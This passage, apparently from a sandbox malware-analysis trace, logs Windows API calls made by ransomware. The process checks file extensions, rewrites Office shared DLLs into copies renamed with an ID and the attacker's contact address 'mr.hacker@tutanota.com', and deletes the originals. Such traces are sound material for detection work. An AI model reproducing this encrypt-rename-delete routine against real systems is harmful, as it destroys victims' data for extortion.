Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0053.934] lstrlenW (lpString=".jpg") returned 4 [0053.934] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0053.934] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0053.934] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0053.934] lstrlenW (lpString=".doc") returned 4 [0053.934] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0053.934] lstrlenW (lpString=".docx") returned 5 [0053.934] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0053.935] lstrlenW (lpString=".pdf") returned 4 [0053.935] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0053.935] lstrlenW (lpString=".xls") returned 4 [0053.935] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0053.935] lstrlenW (lpString=".xlsx") returned 5 [0053.935] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0053.935] lstrlenW (lpString=".ppt") returned 4 [0053.935] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0053.935] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0053.935] lstrlenW (lpString=".zip") returned 4 [0053.935] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0053.935] lstrlenW (lpString=".rar") returned 4 [0053.935] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0053.935] lstrlenW (lpString=".bz2") returned 4 [0053.935] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0053.935] lstrlenW (lpString=".7z") returned 3 [0053.935] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0053.935] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0053.935] lstrlenW (lpString=".dbf") returned 4 [0053.935] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0053.935] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0053.935] lstrlenW (lpString=".1cd") returned 4 [0053.935] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0053.935] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0053.935] lstrlenW (lpString=".jpg") returned 4 [0053.935] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0053.962] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0053.962] lstrlenW (lpString="DBGHELP.DLL") returned 11 [0053.962] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0054.042] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=1369952) returned 1 [0054.042] CloseHandle (hObject=0x1f4) returned 1 [0054.042] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll")) returned 0x20 [0054.042] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0054.042] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0054.042] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.042] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.043] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0054.354] GetLastError () returned 0x0 [0054.354] ReadFile (in: hFile=0x1f4, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0054.375] WriteFile (in: hFile=0x234, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0054.392] ReadFile (in: hFile=0x1f4, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0x4e770, lpOverlapped=0x0) returned 1 [0054.404] WriteFile (in: hFile=0x234, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0x4e780, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0x4e780, lpOverlapped=0x0) returned 1 [0054.412] ReadFile (in: hFile=0x1f4, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.412] WriteFile (in: hFile=0x234, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0xea, lpOverlapped=0x0) returned 1 [0054.412] SetEndOfFile (hFile=0x234) returned 1 [0054.412] CloseHandle (hObject=0x234) returned 1 [0054.412] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.412] SetEndOfFile (hFile=0x1f4) returned 1 [0054.415] CloseHandle (hObject=0x1f4) returned 1 [0054.416] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.416] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll")) returned 1 [0054.416] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0054.416] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0054.416] lstrlenW (lpString=".doc") returned 4 [0054.416] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.416] lstrlenW (lpString=".docx") returned 5 [0054.416] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1 [0054.416] lstrlenW (lpString=".pdf") returned 4 [0054.416] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.416] lstrlenW (lpString=".xls") returned 4 [0054.416] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.416] lstrlenW (lpString=".xlsx") returned 5 [0054.416] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1 [0054.416] lstrlenW (lpString=".ppt") returned 4 [0054.416] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.416] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0054.416] lstrlenW (lpString=".zip") returned 4 [0054.416] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.416] lstrlenW (lpString=".rar") returned 4 [0054.416] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.417] lstrlenW (lpString=".bz2") returned 4 [0054.417] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.417] lstrlenW (lpString=".7z") returned 3 [0054.417] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0054.417] lstrlenW (lpString=".dbf") returned 4 [0054.417] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0054.417] lstrlenW (lpString=".1cd") returned 4 [0054.417] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0054.417] lstrlenW (lpString=".jpg") returned 4 [0054.417] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0054.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0054.417] lstrlenW (lpString=".doc") returned 4 [0054.417] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.417] lstrlenW (lpString=".docx") returned 5 [0054.417] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1 [0054.417] lstrlenW (lpString=".pdf") returned 4 [0054.417] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.417] lstrlenW (lpString=".xls") returned 4 [0054.417] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.417] lstrlenW (lpString=".xlsx") returned 5 [0054.417] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1 [0054.417] lstrlenW (lpString=".ppt") returned 4 [0054.417] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0054.417] lstrlenW (lpString=".zip") returned 4 [0054.417] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.417] lstrlenW (lpString=".rar") returned 4 [0054.417] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.418] lstrlenW (lpString=".bz2") returned 4 [0054.418] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.418] lstrlenW (lpString=".7z") returned 3 [0054.418] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0054.418] lstrlenW (lpString=".dbf") returned 4 [0054.418] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0054.418] lstrlenW (lpString=".1cd") returned 4 [0054.418] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0054.418] lstrlenW (lpString=".jpg") returned 4 [0054.418] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.418] lstrcmpiW (lpString1=".dll", lpString2=".USA") returned -1 [0054.418] lstrlenW (lpString="offfiltx.dll") returned 12 [0054.418] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0054.419] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=1486736) returned 1 [0054.419] CloseHandle (hObject=0x1f4) returned 1 [0054.419] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll")) returned 0x20 [0054.419] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0054.419] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0054.419] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.419] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.420] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0054.420] GetLastError () returned 0x0 [0054.420] ReadFile (in: hFile=0x1f4, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0054.441] WriteFile (in: hFile=0x234, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0054.456] ReadFile (in: hFile=0x1f4, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0x6afa0, lpOverlapped=0x0) returned 1 [0054.469] WriteFile (in: hFile=0x234, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0x6afb0, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0x6afb0, lpOverlapped=0x0) returned 1 [0054.717] ReadFile (in: hFile=0x1f4, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.717] WriteFile (in: hFile=0x234, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.717] SetEndOfFile (hFile=0x234) returned 1 [0054.930] CloseHandle (hObject=0x234) returned 1 [0054.931] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.931] SetEndOfFile (hFile=0x1f4) returned 1 [0054.934] CloseHandle (hObject=0x1f4) returned 1 [0054.934] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.935] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll")) returned 1 [0054.935] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0054.935] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0054.935] lstrlenW (lpString=".doc") returned 4 [0054.935] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0054.935] lstrlenW (lpString=".docx") returned 5 [0054.935] lstrcmpiW (lpString1=".docx", lpString2="x.dll") returned -1 [0054.935] lstrlenW (lpString=".pdf") returned 4 [0054.935] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0054.935] lstrlenW (lpString=".xls") returned 4 [0054.935] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0054.935] lstrlenW (lpString=".xlsx") returned 5 [0054.935] lstrcmpiW (lpString1=".xlsx", lpString2="x.dll") returned -1 [0054.935] lstrlenW (lpString=".ppt") returned 4 [0054.935] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0054.935] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0054.935] lstrlenW (lpString=".zip") returned 4 [0054.935] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0054.935] lstrlenW (lpString=".rar") returned 4 [0054.935] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0054.935] lstrlenW (lpString=".bz2") returned 4 [0054.935] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0054.936] lstrlenW (lpString=".7z") returned 3 [0054.936] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0054.936] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0054.936] lstrlenW (lpString=".dbf") returned 4 [0054.936] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0054.936] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0054.936] lstrlenW (lpString=".1cd") returned 4 [0054.936] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0054.936] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0054.936] lstrlenW (lpString=".jpg") returned 4 [0054.936] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0054.936] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0054.936] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0054.936] lstrlenW (lpString=".doc") returned 4 [0054.936] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0054.936] lstrlenW (lpString=".docx") returned 5 [0054.936] lstrcmpiW (lpString1=".docx", lpString2="x.dll") returned -1 [0054.936] lstrlenW (lpString=".pdf") returned 4 [0054.936] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0054.936] lstrlenW (lpString=".xls") returned 4 [0054.936] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0054.936] lstrlenW (lpString=".xlsx") returned 5 [0054.936] lstrcmpiW (lpString1=".xlsx", lpString2="x.dll") returned -1 [0054.936] lstrlenW (lpString=".ppt") returned 4 [0054.936] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0054.936] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0054.936] lstrlenW (lpString=".zip") returned 4 [0054.936] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0054.936] lstrlenW (lpString=".rar") returned 4 [0054.936] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0054.936] lstrlenW (lpString=".bz2") returned 4 [0054.937] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0054.937] lstrlenW (lpString=".7z") returned 3 [0054.937] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0054.937] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0054.937] lstrlenW (lpString=".dbf") returned 4 [0054.937] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0054.937] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0054.937] lstrlenW (lpString=".1cd") returned 4 [0054.937] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0054.937] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0054.937] lstrlenW (lpString=".jpg") returned 4 [0054.937] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0054.937] lstrcmpiW (lpString1=".FLT", lpString2=".USA") returned -1 [0054.937] lstrlenW (lpString="EPSIMP32.FLT") returned 12 [0054.937] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0054.937] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=712592) returned 1 [0054.938] CloseHandle (hObject=0x1f4) returned 1 [0054.938] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt")) returned 0x20 [0054.938] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0054.938] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0054.938] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.938] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.938] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0054.938] GetLastError () returned 0x0 [0054.938] ReadFile (in: hFile=0x1f4, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0xadf90, lpOverlapped=0x0) returned 1 [0054.951] WriteFile (in: hFile=0x234, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xadfa0, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0xadfa0, lpOverlapped=0x0) returned 1 [0054.962] ReadFile (in: hFile=0x1f4, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.962] WriteFile (in: hFile=0x234, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.962] SetEndOfFile (hFile=0x234) returned 1 [0054.962] CloseHandle (hObject=0x234) returned 1 [0054.963] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.963] SetEndOfFile (hFile=0x1f4) returned 1 [0054.968] CloseHandle (hObject=0x1f4) returned 1 [0054.968] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.969] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt")) returned 1 [0054.969] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0054.969] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0054.969] lstrlenW (lpString=".doc") returned 4 [0054.969] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0054.969] lstrlenW (lpString=".docx") returned 5 [0054.969] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0054.969] lstrlenW (lpString=".pdf") returned 4 [0054.969] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0054.969] lstrlenW (lpString=".xls") returned 4 [0054.969] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0054.969] lstrlenW (lpString=".xlsx") returned 5 [0054.969] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0054.969] lstrlenW (lpString=".ppt") returned 4 [0054.969] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0054.969] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0054.969] lstrlenW (lpString=".zip") returned 4 [0054.969] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0054.969] lstrlenW (lpString=".rar") returned 4 [0054.969] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0054.969] lstrlenW (lpString=".bz2") returned 4 [0054.969] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0054.970] lstrlenW (lpString=".7z") returned 3 [0054.970] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0054.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0054.970] lstrlenW (lpString=".dbf") returned 4 [0054.970] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0054.970] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 